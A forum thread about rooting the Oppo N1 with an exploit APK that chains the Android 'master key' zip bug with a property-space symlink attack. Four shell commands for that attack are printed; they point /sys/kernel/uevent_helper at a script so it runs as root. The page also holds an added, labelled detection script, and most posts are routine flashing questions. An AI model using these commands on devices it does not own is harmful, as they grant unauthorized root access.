APK root exploit

jcase

Retired Forum Moderator / Senior Recognized Develo
I tweeted this a couple of weeks ago before the N1 was publicly out, but here you go. Nothing fancy, no real UI or output.

Thanks to Saurik and Giantpune for contributing (i.e. it's based on their research).

Install the APK, run it, wait 1 minute, install the SuperSU app from the market, then uninstall with this command:

adb uninstall com.qualcomm.privinit

jcase

Retired Forum Moderator / Senior Recognized Develo
Quote:
Do you have a link to their research or are their findings private?

Regards,

saurik - his analysis of the "second master key vuln"

giantpune for his symlink attack vuln in property space:

Code:
/system/bin/mv /data/property /data/backupprop
/system/bin/mkdir /data/property
/system/bin/ln -s /sys/kernel/uevent_helper /data/property/.temp
/system/bin/setprop persist.sys.fail /data/pwn.sh
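As an added defender-side check (written for this page; not code from the thread or from giantpune), a POSIX sh script that looks for the artefacts the property-space symlink attack above leaves on a device: a symlink inside the property store, a non-empty kernel uevent_helper, and the leftover /data/backupprop copy. The default paths are the ones from the attack listing; the assumption that uevent_helper is empty on an untouched Android kernel is mine, and each function takes an optional path so it can be tried against constructed directories.

```shell
#!/bin/sh
# Added detection check (not from the thread). Each function takes an optional
# path so it can run against constructed test directories as well as the real
# Android locations the attack uses. Run from an adb shell on the device.

# Returns 0 when the property store holds no symlinks, 1 if one is found.
# The attack replaces /data/property with a directory containing a symlink
# pointing at /sys/kernel/uevent_helper.
check_property_dir() {
    dir="${1:-/data/property}"
    [ -d "$dir" ] || return 0
    found=0
    # Include dot-files: the attack names its symlink ".temp".
    for f in "$dir"/* "$dir"/.[!.]*; do
        [ -e "$f" ] || [ -L "$f" ] || continue   # skip unmatched globs
        if [ -L "$f" ]; then
            echo "WARN: symlink in property store: $f -> $(readlink "$f")"
            found=1
        fi
    done
    return "$found"
}

# Returns 0 when uevent_helper is empty (assumed Android default), 1 otherwise.
# Any path written here is run by the kernel as root on the next uevent, which
# is why the attack points a property file at it.
check_uevent_helper() {
    file="${1:-/sys/kernel/uevent_helper}"
    [ -r "$file" ] || return 0
    value=$(cat "$file")
    if [ -n "$value" ]; then
        echo "WARN: uevent_helper is set to: $value"
        return 1
    fi
    return 0
}

# Returns 0 when no leftover copy of the property store exists, 1 otherwise.
# The attack first moves the real /data/property aside to /data/backupprop.
check_backup_dir() {
    dir="${1:-/data/backupprop}"
    if [ -d "$dir" ]; then
        echo "WARN: leftover property store backup: $dir"
        return 1
    fi
    return 0
}
```

A non-zero return from any of the three functions means the device still carries traces of the technique and should be treated as compromised rather than merely "unrooted".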

coolrevi

Senior Member
Quote:
I tweeted this a couple of weeks ago before the N1 was publicly out, but here you go. Nothing fancy, no real UI or output.

Thanks to Saurik and Giantpune for contributing (i.e. it's based on their research)

Install the APK, run it, wait 1 minute, install the SuperSU app from the market, then uninstall with this command

adb uninstall com.qualcomm.privinit

Will this exploit work on any other device? When I try to install, the Play Store warns about the vulnerability. Will this vulnerability be gone after uninstalling oppoown?
 

jcase

Retired Forum Moderator / Senior Recognized Develo
Quote:
Will this exploit work on any other device? When I try to install, the Play Store warns about the vulnerability. Will this vulnerability be gone after uninstalling oppoown?

Possibly other Oppo devices.

No, it doesn't fix the vuln, just be careful where you install apps from.
 

pulser_g2

Admin Emeritus / Senior Recognized Developer
Quote:
A second master key vulnerability? Hmm, so this might not be patched in 4.4?
Great job by the way, I don't have the device but this is interesting!

It should be patched in 4.4.

But some (read most) OEMs still can't manage to patch their devices up to the latest security updates on release.

Anyway, I tested this root method a week or so ago and it works nicely :)
 

Ricky Divjakovski

Recognized Developer / Recognized Contributor
Quote:
It should be patched in 4.4.

But some (read most) OEMs still can't manage to patch their devices up to the latest security updates on release.

Anyway, I tested this root method a week or so ago and it works nicely :)

So you're saying in most devices the master key patch could be a possible vulnerability still in 4.3?

interesting...
 

jcase

Retired Forum Moderator / Senior Recognized Develo
Quote:
So you're saying in most devices the master key patch could be a possible vulnerability still in 4.3?

interesting...

It depends on whether OEMs backported it, on which build OEMs used, and on the bug. There are four or five different zip parser bugs with similar results. The one I used was patched in 4.3, but others exist.

trickraca

New member
I'm trying to figure out why the oppown apk will not install on my N1. Every time I try, it just says "app not installed". But on the install screen it says something about being an update to an already installed program. Any clues as to what the issue is? All I've done is update to the latest OTA software, and I'm currently located in Indonesia if that makes a difference.
 

jcase

Retired Forum Moderator / Senior Recognized Develo
Quote:
I'm trying to figure out why the oppown apk will not install on my N1. Every time I try, it just says "app not installed". But on the install screen it says something about being an update to an already installed program. Any clues as to what the issue is? All I've done is update to the latest OTA software, and I'm currently located in Indonesia if that makes a difference.

Possibly they patched it by now; if you are on CyanogenMod you are certainly patched.

Sent from my HTC Two

Harfainx

Retired Forum Moderator
Quote:
So how do you root the CyanogenMod edition N1? Can you help please? Does it come rooted or what?

You don't need to root if you aren't staying on stock. There's no lock anywhere on the bootloader or anything.

Simply flash TWRP in fastboot, then flash Omni (or whatever else) through TWRP.

You should be able to just flash a SuperSU zip in TWRP as well if you want to root the stock ColorOS.

Sent from my N1 using Tapatalk

giuliano rigon

Senior Member
noobish doubts..

Quote:
You don't need to root if you aren't staying on stock. There's no lock anywhere on the bootloader or anything.

Simply flash TWRP in fastboot, then flash Omni (or whatever else) through TWRP.

You should be able to just flash a SuperSU zip in TWRP as well if you want to root the stock ColorOS.

Sent from my N1 using Tapatalk

Please, I need a walkthrough..
1) download TWRP
2) put it in the root of the telephone robot
3) flash it in recovery?
4) reboot recovery, wipe cache and dalvik, flash OmniRom..
Please correct me..
Thank you
 

Harfainx

Retired Forum Moderator
1) download twrp - Yes
2) put it in root of the telephone - Yes
Make sure to copy Omnirom to your phone at some point
3) flash it in recovery? - No - Flash TWRP in Fastboot if you haven't flashed the recovery already. Use the official Teamwin site for guidance
4) reboot recovery wipe cache and dalvik flash omnirom.. - Wipe Cache, Dalvik, System, and Data
Updates in Red

This is off-topic for this thread though. Questions/Info for flashing Omnirom should be addressed in the Omnirom thread.
 

nowy57

Senior Member
Quote:
You don't need to root if you aren't staying on stock. There's no lock anywhere on the bootloader or anything.

Simply flash TWRP in fastboot, then flash Omni (or whatever else) through TWRP.

You should be able to just flash a SuperSU zip in TWRP as well if you want to root the stock ColorOS.

Sent from my N1 using Tapatalk

May you provide the right superSU.zip files?

I've got superSU from this link and it doesn't work on the first and second CM version :(
I am not rooted yet ...
thanks
 

giuliano rigon

Senior Member
not rooted.. confirm i can flash

Quote:
May you provide the right superSU.zip files?

I've got superSU from this link and it doesn't work on the first and second CM version :(
I am not rooted yet ...
thanks

I have tried my damnedest to root: fastboot flashing SuperSU, flashing from recovery, direct install from Google Play, complete unroots and reflash letting recovery do it.. No way..
So now I need a last confirmation.. Can I flash OmniRom after wipes even if I am unrooted? And has anyone rooted OmniRom or does it come unrooted? Thanks for the info.. Another idea.. Flashing Color OS footing and then flashing Omni.. Or is this a late night bad dream..


Quote:
That does work. You're likely not removing root, but rather just uninstalling SuperSU.

I answered you in your Q&A thread on root.

Sorry, now I got it.. It was in the forums.. Just unchecking the "respect cyanogen settings" option in the SuperSU menu got me rooted and happy.. Sorry for your time.. I flashed the SuperSU zip from recovery, rebooted and unchecked it.. Now I am set..